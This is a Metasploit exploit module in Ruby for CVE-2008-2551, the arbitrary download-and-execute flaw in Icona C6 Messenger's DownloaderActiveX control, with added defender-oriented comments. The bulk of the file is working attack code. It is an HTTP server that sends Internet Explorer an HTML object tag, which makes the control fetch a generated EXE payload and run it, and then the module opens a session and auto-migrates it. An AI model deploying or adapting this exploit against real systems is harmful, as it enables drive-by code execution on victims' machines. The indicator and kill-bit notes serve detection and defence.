Path: blob/master/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser-delivered module for CVE-2008-2551 in Icona SpA C6 Messenger 1.0.0.1.
#
# What the code below does: it runs an HTTP server with two response paths.
# A request from an Internet Explorer user agent receives an HTML page that
# instantiates the DownloaderActiveX control by CLSID, sets its
# propDownloadUrl parameter to a URL on this server and sets
# propPostDownloadAction to "run". A request whose URI contains the
# per-run random token receives a generated EXE.
#
# Review notes for defenders, limited to what this file shows:
# - Network/content indicator: an <object> tag carrying
#   CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61 together with
#   propPostDownloadAction=run and a propDownloadUrl ending in .exe.
# - Per the original author's comment, the control fetches the file with a
#   User-Agent containing "File Session"; an outbound .exe download with that
#   agent string is worth alerting on.
# - Mitigation: remove the affected product/control, or set the Internet
#   Explorer kill bit for the CLSID above so the control cannot be
#   instantiated from web content.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  # Registers the module metadata (name, references, defaults, payload
  # constraints and targets) with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    module_info = {
      'Name' => 'Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute',
      'Description' => %q{
        This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The
        vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The
        insecure control can be abused to download and execute arbitrary files in the context of
        the currently logged-on user.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Unknown', # Nine:Situations:Group::SnoopyAssault, vulnerability discovery and exploit
        'juan vazquez' # metasploit module
      ],
      'References' => [
        ['CVE', '2008-2551'],
        ['OSVDB', '45960'],
        ['BID', '29519']
      ],
      # The default below asks the framework to run the priv_migrate post
      # module when a session opens; that module's behavior is not shown here.
      'DefaultOptions' => {
        'EXITFUNC' => 'none',
        'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
      },
      'Payload' => {
        'Space' => 2048,
        'StackAdjustment' => -3500
      },
      'Platform' => 'win',
      'Targets' => [
        ['Automatic', {}]
      ],
      'DisclosureDate' => '2008-06-03',
      'DefaultTarget' => 0,
      'Privileged' => false
    }

    super(update_info(info, module_info))
  end

  # Always reports false to the framework's autofilter hook.
  def autofilter
    false
  end

  # Delegates the dependency check to use_zlib.
  def check_dependencies
    use_zlib
  end

  # HTTP request callback. Serves either the EXE (when the URI contains the
  # per-run token) or the HTML page that instantiates the ActiveX control.
  #
  # @param cli the client connection object handed in by the HTTP server mixin
  # @param request the incoming HTTP request (headers and uri are read)
  def on_request_uri(cli, request)
    # Two agents are accepted: Internet Explorer ("MSIE x.y") for the landing
    # page, and "File Session", which the original author notes is what the
    # control sends when it requests the EXE. Everything else is rejected.
    user_agent = request.headers['User-Agent']
    unless user_agent =~ /MSIE \d\.\d|File Session/
      print_error("Target not supported: #{user_agent}")
      return
    end

    # When the server is bound to all interfaces, use the local address that
    # routes to this client; otherwise use the configured SRVHOST as-is.
    bind_host = datastore['SRVHOST']
    host = bind_host == '0.0.0.0' ? Rex::Socket.source_address(cli.peerhost) : bind_host
    payload_url = "http://" + host + ":" + datastore['SRVPORT'].to_s + get_resource() + "/#{@payload_rand}"

    # Second-stage request: the URI carries the token chosen in #exploit.
    if request.uri.match(/#{@payload_rand}/)
      regenerated = regenerate_payload(cli)
      return if regenerated == nil

      exe_data = generate_payload_exe({ :code => regenerated.encoded })
      print_status("Sending EXE payload")
      send_response(cli, exe_data, { 'Content-Type' => 'application/octet-stream' })
      return
    end

    # Random 1-5 letter file name for the download URL placed in the page.
    exe_name = rand_text_alpha(1 + rand(5))

    # The page body: the control is referenced by CLSID, told where to
    # download from (propDownloadUrl) and told to run the result
    # (propPostDownloadAction). These parameters are the content signature a
    # proxy or IDS rule can match on.
    content = %Q|
<html>
<object id="DownloaderActiveX1" width="0" height="0" classid="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" codebase="DownloaderActiveX.cab#Version=1,0,0,1">
<param name="propProgressBackground" value="#bccee8">
<param name="propTextBackground" value="#f7f8fc">
<param name="propBarColor" value="#df0203">
<param name="propTextColor" value="#000000">
<param name="propWidth" value="0">
<param name="propHeight" value="0">
<param name="propDownloadUrl" value="#{payload_url}/#{exe_name}.exe">
<param name="propPostDownloadAction" value="run">
<param name="propInstallCompleteUrl" value="">
<param name="propBrowserRedirectUrl" value="">
<param name="propVerbose" value="0">
<param name="propInterrupt" value="0">
</OBJECT>
</html>
|

    print_status("Sending #{self.name}")

    send_response_html(cli, content)

    handler(cli)
  end

  # Picks the per-run random URI token (5-9 letters) that marks EXE requests,
  # then hands control to the parent implementation.
  def exploit
    @payload_rand = rand_text_alpha(5 + rand(5))
    super
  end
end